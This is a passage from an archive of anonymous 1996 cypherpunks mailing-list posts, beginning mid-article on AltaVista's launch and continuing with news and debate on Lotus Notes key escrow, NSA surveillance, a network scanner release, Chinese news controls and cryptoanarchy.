Digital's Samuel H. Fuller, VP of corporate research for Digital, and Alan Jennings, Digital's manager of advanced technology business development, also told Newsbytes that Alta Vista has "re-started its Web crawling," to add even more pages to the total of 60 million Web pages -- representing half of all pages on the Web -- that were already indexed by December 15, when the new "super spider" Web facility opened to the public.  "And as Alta Vista took off as the fastest growing Web site, we have quadrupled the capacity of our AlphaServer 8400 system from two to eight processors, and doubled the memory," noted Fuller.  This leaves a "factor of two headroom" in terms of both processing power and memory, meaning that a single 8400 system should be able to host and accommodate an index for the entire Web, the VP added. The Alta Vista site also uses a smaller Alpha server to house the "super spider" itself.  As reported in Newsbytes on December 15, Jennings previously said that Alta Vista is able to search up to 2.5 million Web pages a day. Lycos, Alta Vista's closest competitor, had searched only 7 million Web pages up to that time, and the World Wide Web Worm about 3 million Web pages, in comparison to Alta Vista's 60 million pages, Newsbytes was told.  Alta Vista's high search speeds are made possible by the ability of the super spider to algorithmically "breed" batches of smaller Web crawlers, together with the use of Alpha processing power and high-speed ATM (asynchronous transfer mode) networks, according to Jennings.  Fuller and Jennings told Newsbytes this week that Digital is currently assessing Alta Vista usage patterns and the half dozen- or-so "business inquiries" received each day to decide where to take Alta Vista on a commercial basis.  On Friday, December 15, Alta Vista received 300,000 hits, a number that grew to 600,000 on Monday, December 18, 1.5 million by Wednesday, December 20, and 2 million per day following the December holidays, according to Fuller.  In earlier beta testing, some 10,000 users employed Alta Vista to look up references to themselves and their families, to locate old friends and college roommates, and to access market research, information about the Web, and facts about corporate travel destinations.  Like their counterparts within Digital, many Web users among the public at large have been employing Alta Vista for genealogically search purposes, Jennings said.  Alta Vista is also emerging as "a real solid research tool covering the breadth of the Web," he asserted. In addition to obtaining an index of all Web sites containing a specified search term, and being able to move to those sites through hotlinks, users can obtain "reasonably good information regarding the characteristics of Web sites," such as "how frequently (the sites) are referenced, and the number of pointers."  You can also employ can also employ case-sensitive matches, and limit searches to titles or other specified sections of a document.  Digital officials have been impressed by Web users' "ingenuity" in inventing applications for Alta Vista. One company, for example, wanted to get in touch with all other firms with links to its site, he illustrated.  Upon learning that Alta Vista is able to search for URLs (user resource locators), or pointers, the user conducted a URL search, and then proceeded to send out a broadcast e-mail message over the Internet to all linked sites.  Business inquiries, he reported, have fallen into three main categories: users who want to use Alta Vista internally, license the search engine, or advertise their goods and services on the Alta Vista home page.  "We'll start to make decisions on these within the next 30 days, and by the end of the quarter, (the decisions) will be part of our general business plans," Jennings told Newsbytes.  "Digital is inching toward decisions on what they're going to do," pointed out Jim Green, an analyst at Summit Strategies.  "Clearly, this Web site has met with astounding success. Alta Vista lets you start to make sense of the Internet. It makes you think about exactly what you want, because it will give you everything," the analyst told Newsbytes.  "I see Alta Vista as a very useful tool for competitive analysis," observed Greg Kline, director, Network Integration and Management Research, at the Business Research Group (BRG).  "I think that as Digital gets closer to finalizing their plans, they'll be speaking more about Alta Vista's most sophisticated search capabilities. And as Web servers become the corporate infrastructure through the "IntraNet,' users will be seeing the need for a tool to index their information assets," Kline told Newsbytes. You can access the Alta Vista home page on the Web at  .  A.E.N.

@_date: 1996-01-14 09:34:58
@_author: Anonymous 
@_subject: COMMUNITY CONNEXION... 
Attila sez:
   Sounds like you're a little weak on your history, Attila. Not that I
agree with the SWC's policies one bit, but some basic dates and facts -
when SW was born, when he founded his C, when WW2 was, what the Nazis did
during it and what the SWC has done since, when and how the anti-Nazi and
hate speech laws were passed in Germany, whether "any" speech or revision
against the SWC's agenda (or do you just mean "JEWS"?), etc - would make
pretty short work of your nonsense.

@_date: 1996-01-15 08:34:39
@_author: Anonymous 
@_subject: COMMUNITY CONNEXION... 
Mike Duvos:
   And you win this week's ward for best diversionary grammar lesson.
   I know the difference between *actual* genocide (like, the kind a bunch
of my family members died in) and what the SWC does. Is that a grammatical
   Is there any reason I should have done otherwise? I don't especialy
*want* a reputation, good or bad, on this list - but that doesn't have
anything to do with whether I want to or should *say* something. Tell me:
Why do *you* want a name attached to my history lesson?

@_date: 1996-01-17 19:13:42
@_author: Anonymous 
@_subject: Ozzie on Notes Crater 
Ozzie Outlines New Feature At RSA Data Security
San Francisco, Jan. 17 -- Ray Ozzie, president of Iris
Associates, the developer of Lotus Notes, informed an
audience at the RSA Data Security Conference here today
that Notes Release 4, which began shipping this month,
utilizes a new method of security called "differential
workfactor cryptography." This new method allows the
International Edition of Notes to use an encryption key
equal in strength to the 64-bit key in the North American
Edition, without the use of "key escrow" technologies.
Ozzie explained that in the International Edition of
Lotus Notes Release 4, whenever an encrypted 64-bit bulk
data key is generated by the product, it is bound to a
"workfactor reduction field," giving the U.S. government
exclusive access to 24 of the 64 bits.  When using the
North American Edition of Lotus Notes within the U.S. and
Canada, however, full 64-bit encryption is employed
without the "workfactor reduction field."  The two
editions of Notes are fully interoperable.
"We are very pleased to have arrived at a pragmatic
short-term solution that addresses our international
customers' requests for greater security within Notes,"
Ozzie said.  "However, we continue to argue vigorously
that, due to clear and present threats to our global
information systems, all interests would be well served
by widespread use of strong, high-grade cryptography. Without substantial rethinking of U.S. cryptography
policy, particularly as it pertains to export controls,
our global and national economic security is at risk."

@_date: 1996-01-18 13:15:22
@_author: Anonymous 
@_subject: Attack Simulator 
Internet Scanner Software Checks Network Security Atlanta, Jan. 17 -- Internet Security Systems has
released version 3.2 of its Internet Scanner software. The company said the program is an "attack simulator"
that tests your organization's network for security
holes.  ISS said Internet Scanner 3.2 has enhanced reporting
capabilities and added tests for more than 130 security
vulnerabilities, including the recently revealed
Microsoft File Sharing bug. "Our added focus on Microsoft
security holes stems from our customers' rapid adoption
of TCP/IP (Transmission Control Protocol/Internet
Protocol)-enabled Microsoft Windows NT and Windows 95,"
said Chris Klaus, founder and chief executive officer of
ISS.  According to Don Ulsch, a security consultant affiliated
with the National Security Institute in Westborough,
Massachusetts, The movement to Windows 95 created a whole
new set of security concerns for network administrators.
"Similar to virus scanning software, a security scanning
tools' value to a corporation declines quickly unless it
can detect the latest security holes. In the security arena, every upgrade is crucial," said Ulsch.  New features of Internet Scanner 3.2 include added
reporting capabilities including hyperlinks that connect
to CERT advisories and vendor World Wide Web sites to
pull down patches and information regarding network
holes, and addition of Linux as a supported platform. The
company said that will allow easy scanning from laptop
PCs.  The additional tests added to the new version include the
Microsoft File Sharing bug, the TelnetD bug, the Stealth
Scan, Finger Bomb, and misconfigured Linux NIS services. The company said its customers who have current
maintenance contracts can now electronically download the
updated version from the USS Web home page at
  Internet Security Systems, tel 770-441-2531, fax
770-441-2431

@_date: 1996-01-19 00:57:28
@_author: Anonymous 
@_subject: Ozzie Apes Jim Clark, Fix Is In to Cave and Cry 
Wall Street Journal, Jan 18, 1996
IBM Compromises on Encryption Keys, U.S. Allows Export of
More-Secure Notes
By Thomas E. Weber
New York -- International Business Machines Corp., caving in
to intense government pressure, agreed to include a special
key that helps investigators tap into data messages in return
for permission to export a more-secure version of its Lotus
Notes software.
The U.S. has prevented software makers from exporting
sophisticated encryption technology for fear that terrorists
and other criminals would gain access to a snoop-proof
communications system. Industry observers said IBM's move
marked the first time a supplier agreed to give the government
special access to its software's security code.
Encryption keys have stirred the concern of privacy experts in
the past. While IBM's Lotus Development Corp. software unit
defended the move as a stopgap compromise until a broader
agreement on data security can be reached, Notes creator Ray
Ozzie clearly found the controversial plan somewhat
"We were desperate enough to try to negotiate a short-term,
pragmatic solution," Mr. Ozzie said. "But we do not believe
this is the right long-term solution."
One privacy advocate would agree. "The irreducible fact is
that foreign customers are reluctant to rely on security
products that have been compromised in some way" by federal
intelligence agencies, said Mike Godwin, staff counsel for the
Electronic Frontier Foundation.
Several years ago the government proposed the "Clipper"
computer chip that was programmed to let investigators tap
into phone calls and data messages transmitted digitally.
While that plan died after privacy advocates accused the
government of trying to spy on users, the idea of leaving a
back door open for government agents has remained alive.
Under the Lotus plan, government investigators would still
need to employ sophisticated code breaking to read messages
sent via Notes software, which lets users at different
computers collaborate. Security software encrypts information
by using a unique key of software code. The length of a key is
measured in computer bits, and longer keys are better --
they're more complex and more difficult for would-be spies,
not to mention government agents, to unravel.
Until now, to obtain an export license for Notes, Lotus has
been restricted to an encryption system of 40 bits in its
international version. Domestic users have been permitted to
use a higher-level, more-secure 64-bit system.
The new overseas version of Notes, tagged Release 4, will give
foreign users 64-bit security. But to get permission to export
the software, Lotus agreed to give the government access to 24
of those bits by using a special 24-bit key supplied by the
National Security Agency.
The plan effectively gives the government a headstart in
trying to break the encryption scheme. With 24 bits of the key
already in hand, the government need only crack the remaining
40 bits -- a task considered trivial for the code-masters at
the NSA. As far as the U.S. government is concerned, this
version of Notes is no more difficult to crack than the
previous one.
The advantage to customers, Mr. Ozzie said, is that anyone
other than the U.S. government -- say, a malevolent criminal
or computer hacker -- would face the more daunting task of
breaking the 64-bit key.
Mr. Ozzie said the move was a response to complaints from
foreign purchasers of Notes. "Our customers have been telling
us that, unless we did something about the security, we could
no longer call it a secure system," Mr. Ozzie said.
It remains to be seen whether Lotus's move will allow it to
sell more software. "The idea is a good stopgap measure," said
Stephen Franco, an analyst at Yankee Group in Boston. "But the
most important thing is pushing the U.S. government to relax
some of its restrictions" on exports.

@_date: 1996-01-19 10:51:34
@_author: Anonymous 
@_subject: Junk Notes 
New York (AP) -- For the first time in years, there were
no major trouble spots in IBM's vast product line. Both
personal computers and large systems sold well and Lotus
Development Corp., which IBM acquired last summer,
shipped an astounding 1.2 million copies of its Notes
program. "Our fundamental strategies are working," IBM
chief executive Louis V. Gerstner Jr. said in a
statement.  ...
Changes in the general export laws seemed unlikely so
Lotus negotiated an interim solution. "This protects
corporate information from malicious crackers but permits the government to retain their current
access," Ozzie said.
Simson Garfinkel, author and computer security expert,
said he's not sure international buyers of Notes will
like the solution. "Foreign companies don't want the U.S.
government to spy on their data any more than the U.S.
government wants foreign companies to be able to spy on
theirs," Garfinkel said.  ...
But IBM said nothing about the future, causing some
nervousness among the investors who have seen other
technology companies project a flat performance in the
next few months. "It was a good quarter but the bad news
is we've got to go and find out what's going to happen in
1996," said David Wu, analyst at Chicago Corp.  Questions have been raised about the timing of IBM's June
acquisition of Lotus -- a $3.5 billion deal that was the software industry's largest ever -- because World Wide
Web-related programs seemed to be eclipsing the need for
Lotus' Notes, a communications and database program.

@_date: 1996-01-19 17:29:24
@_author: Anonymous 
@_subject: Respect for privacy != Re: exposure=deterence? 
Oh, my! A little sensitive, are we? Aren't you even a *little*
struck by the fact that fucking with people's personal lives is *precisely* what errant government officials *do*???
Some might opine that the reason we have so many abuses is that
so *few* people use the power they hold in their hands to set things right. Even the well-intentioned seem to expect someone *else* to do their maintenance of the republic for them.
That's part of The Game, Rich.  It makes it all that much easier for people to dismiss attempts at delineation by saying things like, oh, "The line between government and non-government is increasingly blurry anyway."
Oh. Okay, then. That makes it OK for them to indict you to keep their statistics up. Works for me!
I'm not. Maybe *you* should be more suspicious of the guy getting
paid $100K of direct government money to manage a national campaign of low-key terror than you should of the private businessman unable to pay himself because he *must* pay his employees and the government doesn't leave him enough for his own paycheck. This last is a *lot* more common than the "private businessman getting millions of dollars in government subsidies."
"Looking for pow'r... in all the wrong places, (la-tee-dah)..."
Admit it, Rich, you only see harmful power where you want to see it, and that isn't in government -- it is in private hands, particularly *corporate* hands. Geez, but you'd think that left-handed university cookie cutter would have gotten dulled and broken by now, and that they'd have fashioned a new one.
I'd estimate that the Postmaster General is more powerful than Fidel Castro in many respects. He's certainly a lot more powerful than your average private businessman.
That's quite all right. We can be sure he won't ignore *you*.
We Jurgar Din
(that will have to suffice: I do not yet live in a free country)
+"The battle, Sir, is not to the strong alone. It is to the+
+vigilant, the active, the brave. Besides, Sir, we have no +
+election. If we were base enough to desire it, it is now  +
+too late to retire from the contest." -Patrick Henry 1775 +

@_date: 1996-01-19 17:39:57
@_author: Anonymous 
@_subject: NSA vacuuming down Internet traffic 
"...the same article had Madsen stating that the NSA is     vacuuming down Internet traffic. he gave the likely entry     points that they are doing this."
It's a virtual lead-pipe cinch that this is being done and
probably has been going on for longer than anyone would like to In the 1960's - 1970's when international cable traffic was in its computer infancy, access was had to EVERY CABLE MESSAGE passing through the message switches of U.S. common carriers.
This means no only every international cable message originating from or destined to a U.S. point, but also included every message ROUTED THROUGH the U.S., such as Europe <--> South America. There was no great skullduggery involved -- the common carriers simply made copies of their own log tapes and handed them to messengers from the, ah, FCC (ahem). It was on the operations checklist and no one thought twice about it. It may be urban legend to some, but I've seen it with my own eyes, handled the tapes with my own hands. If anyone else wishes to move this from the status of urban legend to something more solid, all they have to do is locate and ask people who worked in message switch operations at RCA Global Communications, ITT World Communications, or Western Union International, the three common carriers of that time.
Knowing this, I would assume something similar was done at overseas locations of the same carriers and at such other access points as could be compromised. An organization such as NSA that viewed this as SOP would have to be brain dead not to be doing
the same thing with the Internet. The only question in my mind is how far they have gone beyond USENET and the newer, fertile ground of web sites. Are they vacuuming packets and reassembling email? Just how many laser discs have been filled with coherent Time to exercise those plain, brown envelopes.
We Jurgar Din
(that will have to suffice: I do not yet live in a free country)
+"The battle, Sir, is not to the strong alone. It is to the+
+vigilant, the active, the brave. Besides, Sir, we have no +
+election. If we were base enough to desire it, it is now  +
+too late to retire from the contest." -Patrick Henry 1775 +

@_date: 1996-01-19 19:16:17
@_author: Anonymous 
@_subject: Indecent Trash 
I can see it now... about the time that Grandson of Altavista finally yields a URL for Jimmy Hoffa's body in some dump somewhere the government will have figured out that it's so much simpler to catalog the stuff on the way IN, when all the artifacts are fresh and unmixed. While we're all watching what the government does to intercept packets, they will be routing *trash* packets through mysterious "garbage routers."  As the stink grows stronger, someone will conceive of anonymous trash forwarders. They will accept unidentified trash, no questions asked, anonymize it with random DNA and fingerprint whorls, and sneak it into public trash receptacles. DNA generators will enable the mischievous to plant fabricated indications that Hillary did indeed have something going with Vince, the late Khomeini (hey, hard is hard, right?) as well as legions of four-footed friends, confirming the suspicions of As the piles of trash-based data grow, some Senator from
Nebraska will sound the alarm that kids are too easily exposed
to the indecent signs of private behavior retrievable on the
Net and will propose draconian measures to hold everyone
responsible for their contributions to the city landfill. Public receptacles will be closed. Trash will only be collected from registered Identifed Surplus Providers (ISP's). $250,000 fine for disposing of a condom in a dump accessible from the Internet... 10 years in prison for carelessly tossing those nasty Polaroids in the kitchen compactor. The trash of the world
will have to be made safe for kids to view.
Everything will be a lot easier to trace and control if the
garbage input is fully identified. Barcodes on trash bags
might do for starters. Access to the garbage system might have
to be restricted to those 18 and over. Trash collectors could
be made responsible for content, drafting them without pay into
the ranks of the trash police. People could be encouraged to
report suspicious trash, and trash-related activities like
neighbors sneaking out at night to place an innocent-looking
compactor bag down the block with someone else's trash.  For their own protection, youngsters might be required to retain all their garbage until age 18 and then, in a solemn ceremony worthy of the true significance of coming of age, pitch it all (duly anonymized to prevent abuse of minor indiscretions) from their new position as lawful participants in the world garbage system, friends and well-wishers trying to applaud and hold their noses at the same time (try it -- if you're not careful you can break your own nose, but hey, that'll work, too!). Who knows? Maybe Heinlein's advocacy of keeping kids in a barrel and feeding them through a hole until age 18 will enjoy resurgence among the compulsively protective while the Web meanwhile will provide real time underground data on Heinlein's rpm rate.
Protecting the trash of youth will, however, give rise to the hiding of adult trash among that of the underaged. The government
will have to root out offenders and "impute" suspicious trash to the parents. Those with no visible source of trash will of course be suspect, and will have to emit innocent trash to cover themselves. This will give rise to the practice of "trash laundering," in which agents convert nasty trash to innocuous trash that may then be tossed into any monitored, controlled channels with no repercussions.
Trash laundering will become a grave offense to the accompaniment of government and Ad Council PSA's and free brochures from Pueblo, Colorado. Blatant offenders who have fled to foreign climes will be kidnapped, some will be tortured,
because the War Against Filth will be a moral commitment of the national body. Foreign governments headed by suspected trash traffickers will be toppled in quickie invasions, their leaders brought back in chains to disappear into federal dungeons. Public debate will center on the legalities and rationalizations of using the military in policing domestic trash, while agencies such as the FBI cry for more budget to fight the scourge that threatens the decency of the nation's repositories.
Control of trash will spread inevitably to control of liquid wastes, whereupon a terrible discovery will be made: Everyone, but everyone, emits unspeakable bodily products. At that point the government will have no choice but to reluctantly declare everyone an outlaw and execute the populace.
It's all as logical as what happens when you introduce division by zero way down at the bottom of the complex equation where it isn't so noticeable.
We Jurgar Din
(that will have to suffice: I do not yet live in a free country)
+"The battle, Sir, is not to the strong alone. It is to the+
+vigilant, the active, the brave. Besides, Sir, we have no +
+election. If we were base enough to desire it, it is now  +
+too late to retire from the contest." -Patrick Henry 1775 +

@_date: 1996-01-21 11:10:27
@_author: Anonymous 
@_subject: New China Ruling Threatens Closure Of News Agencies 01/19/96 
In effect, the edict puts Xinhua, the world's unnewsiest news agency, in charge of agencies normally beyond the grasp of cadre communists -- even in Hong Kong, Macau and, Taiwan. On this basis, the next time Hong Kong billionaire Li Ka-shing did a deal with state authorities that relieved McDonald's Corp. or any other legal entity of its contractual rights (as happened last year), the story would have to be vetted by Xinhua.  Xinhua already made information-control history when it established a service that both disseminates outgoing commercial data on the Internet and filters any incoming information.  Although the State Council's directive gives Xinhua control over strictly "economic" news, the government body has licensed Xinhua to control everything, effectively ruling out reliable news. Stock markets and business plans are driven by market forces -- even in highly manipulated China. Even when one is tempted to think business is market driven, the whims of China's central controllers can skew everything -- as merchandisers in the casual wear clothing market found when that suddenly dried up because the bosses on top didn't like then Giordano clothing store chairman Jimmy Lai.  The State Council's directive will in all likelihood force the New York Times, Reuters and other news organizations to reassess their operations in territories Xinhua is authorized to control.  Controls go beyond editorial conventions. According to Xinhua, foreign wire services will not be allowed to increase subscribers in China "directly nor by ways of establishing joint ventures, solely funded companies or agents."  The Xinhua report said that foreign news providers "will be punished in accordance with the law if their released information to Chinese users contains anything forbidden by Chinese laws and regulations, or slanders or jeopardizes the national interests of China."  Jeopardizing the national interest of China is now taken to mean jeopardizing the interests of the communist party, or the roughly 5% of the population controlling the country from "the barrel of a gun," to borrow from Mao Zedong.  Agencies only learned of the new rules Tuesday night when Xinhua, skirting the usual practice of circulating advisories on operational changes internally, simply put the story on the wire. One Hong Kong agency man told Newsbytes: "We always knew writing stories from China was a problem. Now you have to wonder if we'll be able to send stories from Hong Kong, without having to pass them by Xinhua for approval.  The directive indicates stories will have to pass through Xinhua first -- pointing to a major evacuation of news services, and technology vendors who handle them.  (Nigel Armstrong & I.T. Daily/19960117)

@_date: 1996-01-22 03:10:18
@_author: Anonymous 
@_subject: Ultimate Paranoia 
Fellow Cypherpunks,
I have been lurking around for some time and I have learned alot, But I have
a few questions that I either haven't seen posted or I've missed all together.
I keep PGP stored on a removable hard drive and keep it under lock and
key when it's not in use.  I write and encrypt messages on a stand-alone
that I only have access to. My passphrase is rather long and full of gibberish,
But I still fear the other things that I can not control.
Does anyone make and sell a device that emits white and pink noise?
How do you take the randomness collected from radation sensors to create
a truly random sample for creating a PGP key?
Is there anything else that I might be missing besides lining the walls &
computer in tin foil?   :^) Thanks for your help!

@_date: 1996-01-22 15:30:07
@_author: Anonymous 
@_subject: CIA Stashes and Looted Gold? 
U.S. Hid Weapons In Austria
Vienna, Austria, Jan 21 (AP) -- Fearful of a Soviet
takeover after World War II, the United States hid at
least 79 weapons caches in Austria for anti-communist
According to the newspaper Kurier, a U.S. congressional
committee monitoring CIA activities found documents on
the weapons caches that had not been known to the Clinton
administration.  A report Saturday in the Boston Globe prompted Hunt to
inform the Austrian government, Kurier said.
The Boston Globe report said CIA agents stashed the
weapons while the U.S. military conducted loud military
However, Fritz Molden, a former Austrian journalist, said
Sunday that the secret weapons depots were established at
the initiative of the Austrian government led by
Chancellor Leopold Figl, and planning for them began in
1948. He claimed that some depots were also placed in the
Soviet occupation zone in eastern Austria.
Molden told the APA he had acted as a liaison between the
Americans and the postwar Austrian government. However,
it was not clear why the information was not handed down
to subsequent governments.
Austria demands details on secret US arms depots
Vienna, Austria, Jan. 21 (Reuter) -- Austria's leadership
Sunday demanded the United States supply details of 79
secret U.S. arsenals scattered across Austria.
"The Americans should give us a plan indicating where the
weapons depots are, how serious they have to be taken and
what dangers they pose," Chancellor Franz Vranitzky said. Speaking on television Sunday, Vranitzky cautiously indicated the possibility of secret stockpiles from the
other occupation forces -- France, Britain and the Soviet
"Approaching the other three occupation powers and asking
them whether they too still have secret depots on
Austrian soil will be dealt with in a very pragmatic and
sensible way," Vranitzky said.
The chancellery said the U.S. government was working on
an exact list detailing the locations of the depots, and
U.S. Ambassador Hunt promised to furnish details as
quickly as possible.  The television said experts assume each of the arsenals contained sufficient weapons and explosives for 150 anti-communist guerrillas and could also contain
significant amounts of gold.  Austrian television said that while the U.S. foreign ministry had assured Austria it would act as soon as
possible, the CIA, which alone knows the exact locations
of the arsenals, has remained silent on the issue.
Postwar leaders acted with U.S. on arms caches
Vienna, Austria, Jan. 22 (Reuter) - Austria's postwar
leaders cooperated with the United States to stockpile
arms around the country in a top-secret operation to
safeguard against a Soviet attack, an ex-resistance
fighter said Monday.
Fritz Molden, who acted as a liaison officer between the resistance and the allied powers, said that if the
Kremlin had discovered the plan to organize an
anti-communist underground, Soviet troops would have
immediately annexed eastern Austria.
"It was all top secret. There were no archives, no papers
made, no protocols written," Molden told Reuters.  Molden said he was surprised that Austria's current political leaders were unaware of the arsenals. Details
had appeared in two books, one of which he wrote 16 years
Austrian media speculated that the arsenals were part of
a wider anti-communist strategy by the United States,
which feared Soviet expansionism following the end of
World War II.
Newspapers cited the Gladio operation in Italy, set up as
a secret Cold War resistance group in the 1950s to fight
any Warsaw Pact invasion.
Austrian experts estimated the depots held enough weapons
and explosives for 150 anti-communist guerrillas and
might also contain gold. They said likely sites included
graveyards where digging would have gone unnoticed.
Molden said arms were transported on U.S. trucks and
trains into Vienna, which was surrounded by the Soviet
eastern zone, and then secretly passed on to Austrians
who risked their lives stashing the weapons away.
He suspected most arsenals in western Austria were handed
over to the Austrian army and gendarmerie after 1955 and
that the arms sites in eastern Austria might now also be

@_date: 1996-01-25 17:51:51
@_author: Anonymous 
@_subject: No Subject 
There was some conversation about this recently on rec.gambling.other-games. Several people who work in the industry said that electronic machines
use some sort of PRNG, but with a nice added bit of random input - the
player's timing of hitting the buttons. One poster described it as the
machine constantly generating numbers, and choosing the payoff based
on the last number generated when the user hit a button.
I think that'd work pretty well. It's nice that this is in a slot
machine: typical computers can't afford to waste lots of time
throwing away random numbers.
There was also some speculation about whether the machines were immune
to electronic tampering.

@_date: 1996-01-25 18:24:50
@_author: Anonymous 
@_subject: Pssst......Wanna buy a mailing list? 
A wonderful little annoucement for a new WWW site appeared in my anon
mail this evening, It was for a site offering Privacy Tools and Offshore Activities, Poor guy who sent the message,  sent it without BCCing it
and hence, Everyone who requested his autoresponder file on Anonymous
Banking is listed. (At least 100+ addresses!)  Highlighs of the domains in the mailing:
nea.org       Gotta keep some money stashed for education!
uspto.gov     Nym's requesting infomation for hiding patent $$$
mot.com       Good year for Motorola stocks!
fmr.com       Fidelity Investments....Hmmmmm
I'll bet my last E-Ca$h coin that there will be alot of these people learning
about anonymous remailers the hard way.
L. Malthus  PGP key listed at MIT

@_date: 1996-01-26 21:44:40
@_author: Anonymous 
@_subject: Denning's Crypto Archy 
Cypherptoady's updatest unscratchable crypto itch and salve:

@_date: 1996-01-26 23:54:17
@_author: Anonymous 
@_subject: Attack Simulator 
Internet Scanner Software Checks Network Security Atlanta, Jan. 17 -- Internet Security Systems has
released version 3.2 of its Internet Scanner software. The company said the program is an "attack simulator"
that tests your organization's network for security
holes.  ISS said Internet Scanner 3.2 has enhanced reporting
capabilities and added tests for more than 130 security
vulnerabilities, including the recently revealed
Microsoft File Sharing bug. "Our added focus on Microsoft
security holes stems from our customers' rapid adoption
of TCP/IP (Transmission Control Protocol/Internet
Protocol)-enabled Microsoft Windows NT and Windows 95,"
said Chris Klaus, founder and chief executive officer of
ISS.  According to Don Ulsch, a security consultant affiliated
with the National Security Institute in Westborough,
Massachusetts, The movement to Windows 95 created a whole
new set of security concerns for network administrators.
"Similar to virus scanning software, a security scanning
tools' value to a corporation declines quickly unless it
can detect the latest security holes. In the security arena, every upgrade is crucial," said Ulsch.  New features of Internet Scanner 3.2 include added
reporting capabilities including hyperlinks that connect
to CERT advisories and vendor World Wide Web sites to
pull down patches and information regarding network
holes, and addition of Linux as a supported platform. The
company said that will allow easy scanning from laptop
PCs.  The additional tests added to the new version include the
Microsoft File Sharing bug, the TelnetD bug, the Stealth
Scan, Finger Bomb, and misconfigured Linux NIS services. The company said its customers who have current
maintenance contracts can now electronically download the
updated version from the USS Web home page at
  Internet Security Systems, tel 770-441-2531, fax
770-441-2431

@_date: 1996-01-27 10:08:18
@_author: Anonymous 
@_subject: weak cryptoanarchy 
Some non-cypherpunks seem afraid of Tim May's cryptoanarchy, which, to quote Dr. Denning's recent paper, "suggest the impending arrival of a Brave New World in which governments, as we know them, have crumbled, disappeared, and been replaced by virtual communities of individuals doing as they wish without Perhaps these people are worrying needlessly.  I don't think cryptoanarchy (in this strong form) is a likely scenario for the future.  Even if strong cryptography and anonymous transaction systems are used by everyone, governments can continue to control people's physical actions and properties.  The physical world will continue to exist, even if it becomes relatively less I think a better prediction for the implications of strong crypto is what I would call "weak cryptoanarchy."  That is, cryptography will allow virtual communities the option to exist without the possibility of inteference by force.  Certainly some virtual communities, such as moderated discussion groups, will opt to have formal or informal governments.  The key is that people will have the choice of participating in communities where physical violence will be absolutely powerless.
Stated in this form, cryptoanarchy is hardly controversial.  Plus, this weak form of cryptoanarchy has a much better chance of being realized, because it does not require the collapse of existing governments, only the creation of new communities without governments.

@_date: 1996-01-27 22:46:20
@_author: Anonymous 
@_subject: OpSec Snooping 
Economist, 27 January 1995
Licence to make a killing
Spies and fund managers seem to be cut from the same
cloth. Both take calculated risks, are fickle when it
comes to allegiances and have an annoying tendency to
speak in code. More important, however, they both thrive
on inside information. This may be why, in the headlong
rush to exploit new emerging-market opportunities, a
growing number of investment funds are turning to former
spooks for some help.
The latest fund to tap the know-how of the intelligence
community is the Scottish American Investment Company,
based in Edinburgh, which invests heavily in
international equities. On January 17th it announced that
Sir Colin McColl, the former head of M16, Britain's
foreign-intelligence service, is joining its board of
directors. The fund hopes that Sir Colin's experience in
gauging political risks -- he has worked in Eastern
Europe and SouthEast Asia -- will improve the quality of
its investment decisions.
Another ex-spy turned fund manager is Harry Fitzgibbons,
a former American agent and now managing director of Top
Technology Limited, a fund-management group based in
London. Last year, he teamed up with Alexey Vlasov, a
former Soviet agent, to launch a new high-technology fund
for investment in Russia. It employs three other former
Soviet agents in its St Petersburg office.
Why are spooks so sought after by international
investors? The reason, says Mr Fitzgibbons, is that
spying is the ideal training ground for a career in
emerging-market investing. Not only are intelligence
agents good at spotting when someone is lying, but they
are also experts at building relationships and waiting
patiently for them to develop: two essential traits for
successful long-term investors. Mr Fitzgibbons argues
that it is these general skills, rather than any specific
local knowledge, that makes former spies such attractive
Unfortunately, old adversaries do not always get on as
swimmingly as Messrs Fitzgibbons and Vlasov. In 1994, for
example, the Vietnam Frontier Fund invited William Colby,
a former director of America's Central Intelligence
Agency, who headed the agency's Vietnam station during
the Vietnam War, to join its board of directors. His
appointment prompted the fund's chairman, Nguyen Xuan
Oanh, a former deputy prime minister of South Vietnam, to
quit. Not only did the fund lose its chairman, but it was
unable to take advantage of Mr Colby's experience: he
left the board in December 1994 after Hanoi refused him
a visa.
Despite such drawbacks, the demand for former spooks is
rumoured to be growing. One such hint comes from Parvus,
a consultancy (with offices in Moscow and Silver Spring,
Maryland) that employs a number of ex-spies. The firm
claims that it has just been contacted by a headhunter
looking for recruits. The mission, should anyone choose
to accept it, is to head up a new intelligence unit for
a big New York mutual fund. Unfortunately for potential
applicants, the headhunters say that the fund's name is
still top secret.
URL:                    OPERATIONS SECURITY PROFESSIONALS SOCIETY
   The OPSEC Professionals Society was established in March 1990 to
   further the practice of Operations Security as a profession and to
   foster the highest quality of professionalism and competence among its
   members. OPSEC is a process used to deny to potential    information about capabilities and/or intentions by    controlling and protecting evidence of the planning and executing of
   sensitive activities. This process is equally applicable to
   government, its contractors, and to private enterprise in    protection of their trade secrets and other proprietary    While military strength and capability still are required during the
   next years of uncertainty, we must likewise protect our    economic information and technologies from those who seek to    them to their benefit and to our disadvantage.
URL:                     COUNTERINTELLIGENCE NEWS & DEVELOPMENTS
  Issue No. 1
   Letter from the Director, National Counterintelligence    I am pleased to present the inaugural issue of the National
   Counterintelligence Center's (NACIC) Counterintelligence News and
   Developments (CIND). This periodic publication is designed to meet the
   information needs of US private industry by communicating    yet unclassified information on the threat posed by foreign    against US interests.
   The CIND is part of the NACIC's effort to develop a more    mechanism to disseminate information on foreign intelligence    activities against both the US Government and private industry. This
   initial issue includes some information you may have already seen in
   our Annual Report to Congress on Foreign Economic Collection    Industrial Espionage and the Survey of the Counterintelligence Needs
   of Private Industry. From time to time, we will republish or    information from such key publications to highlight data we    to be of interest to private industry. Furthermore, we will    additional information from all sources in order to better    and support private industry through this unclassified    The NACIC will not generally republish information readily    to the general public. Our goal is to make the CIND's    substantive and relevant to customer needs. Therefore, I    overemphasize the importance of receiving feedback from each of you.
   Future issues will respond to the requirements of industry as a whole
   and will be driven by your needs and interests. The responses received
   from you, the customer, will determine the future content, format, and
   frequency of the CIND. The final page of the current edition    information on how to forward responses to the CIND Editor.
   Michael J. Waguespack
   Director, National Counterintelligence Center
   What Is the NACIC?
   The National Counterintelligence Center (NACIC) was established in
   1994 by Presidential Decision Directive/NSC-24. The NACIC's    was one of the recommendations made by PDD-24 to improve US
   counterintelligence (CI) effectiveness by enhancing coordination and
   cooperation among various US CI agencies.
   An interagency organization staffed with CI and security    from the FBI, CIA, NSA, DIA, and the Departments of Defense and State,
   the NACIC is primarily responsible for coordinating national-level CI
   activities, and reports to the National Security Council through the
   National Counterintelligence Policy Board (NACIPB).

@_date: 1996-01-28 08:39:39
@_author: Anonymous 
@_subject: SEAL cipher info requested (something actually list related!) 
